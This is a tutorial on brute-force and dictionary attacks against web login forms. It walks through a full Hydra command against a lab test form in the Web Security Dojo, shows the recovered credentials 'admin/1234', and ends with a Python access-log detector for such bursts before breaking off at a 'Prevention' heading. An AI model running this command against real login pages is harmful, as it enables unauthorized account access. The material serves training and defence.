Brute-force attacks work by calculating every possible combination that could make up a password and testing each one to see if it is the correct password. As the password's length increases, the average time needed to find the correct password increases exponentially. This means short passwords can usually be discovered quite quickly, but longer passwords may take decades [Source: Wiki].
Such an attack may be feasible in some situations, as computer hardware keeps getting faster. A simple brute-force attack would start with one-character passwords, then two-character passwords, and so on, trying all possible combinations until one works.
A better idea is a "dictionary attack", which tries words from a dictionary, or a list of common passwords, instead of all possible passwords. This can be very effective, as many people use such weak and common passwords.
Automated tools can be used to brute-force web-based login forms.
Using Hydra to dictionary-attack web-based login forms
Hydra is an online password-cracking tool for dictionary attacks. It tries lists of usernames and passwords until a successful login is found. It is multi-threaded and can try username/password combinations at a rate of thousands per minute [Source
Hydra can be used to attack many different services, including IMAP, SMB, HTTP, VNC, MS-SQL, MySQL, SMTP, SSH, and many more.
This tool should not be used to attack websites or services where you do not have permission to do so. Use this for legitimate testing purposes only.
An example attack
The Web Security Dojo has various vulnerable applications that you can use to test these techniques. As an example, the w3af testing framework has a test login at the following location:
http://192.168.1.69/w3af/bruteforce/form_login/
The important parts of the HTML form are:
<form name="input" action="dataReceptor.php" method="post">
Username: <input type="text" name="user">
Password: <input type="password" name="pass">
If we put in one wrong username and password combination we get:
Bad login, stop bruteforcing me!Bad u/p combination for user: a
Now we have the information we need to construct a Hydra dictionary attack against this login form:
hydra 192.168.1.69 http-form-post "/w3af/bruteforce/form_login/dataReceptor.php:user=^USER^&pass=^PASS^:Bad login" -L users.txt -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt
Breaking this command down:
Host = 192.168.1.69
Method = http-form-post
URL = /w3af/bruteforce/form_login/dataReceptor.php
Form parameters = user=^USER^&pass=^PASS^
Failure response = Bad login
Users file = users.txt
Password file = pass.txt
Threads = -t 10
Wait for timeout = -w 30
Output file = -o hydra-http-post-attack.txt
Hydra iterates through all the username/password combinations until it gets a response that does not contain the text "Bad login". When we run this attack we get:
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-08-22 13:11:03
[DATA] 5 tasks, 1 servers, 5 login tries (l:5/p:1), ~1 tries per task
[DATA] attacking service http-post-form on port 80
[STATUS] attack finished for 192.168.1.69 (waiting for children to finish)
[80][www-form] host: 192.168.1.69 login: admin password: 1234
Hydra (http://www.thc.org/thc-hydra) finished at 2011-08-22 13:11:07
As you can see, this was successful and found the user "admin" with password "1234".
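From the defender's side, a run like the one above leaves a distinctive trace in the web server's access log: a burst of POST requests to dataReceptor.php from a single client within a few seconds. The following Python is an added example, not code from the original post; it flags such bursts in an Apache-style "combined" access log using a sliding time window. The log format, client IP addresses, timestamps and the threshold of five attempts per minute are assumptions, and the sample log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Login handler from the walkthrough above; every Hydra guess is a POST to it.
LOGIN_PATH = "/w3af/bruteforce/form_login/dataReceptor.php"
# Apache/nginx "combined" access-log format (assumed log source).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def parse_line(line):
    """Return (ip, timestamp, method, path, status), or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: max POSTs to LOGIN_PATH inside any one window} for IPs at/above threshold."""
    per_ip = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue                      # skip malformed lines rather than crash
        ip, ts, method, path, _status = parsed
        if method == "POST" and path == LOGIN_PATH:
            per_ip[ip].append(ts)
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        start, best = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # drop attempts older than the window
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged

# Constructed sample log (not real traffic): one client hammers the form, another logs in normally.
def _line(ip, second, method="POST", path=LOGIN_PATH):
    return (f'{ip} - - [22/Aug/2011:13:11:{second:02d} +0000] '
            f'"{method} {path} HTTP/1.1" 200 52 "-" "Mozilla/4.0"')

SAMPLE_LOG = ([_line("10.0.0.5", s) for s in range(3, 9)]      # 6 POSTs in 6 seconds
              + [_line("10.0.0.5", 10, "GET", "/")]              # unrelated GET, ignored
              + [_line("10.0.0.9", 5), _line("10.0.0.9", 50)])   # 2 POSTs, normal user
```

Because the vulnerable form returns HTTP 200 for both good and bad logins, the status code alone cannot separate failures from successes here; the rate of POSTs per client is the signal.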
Prevention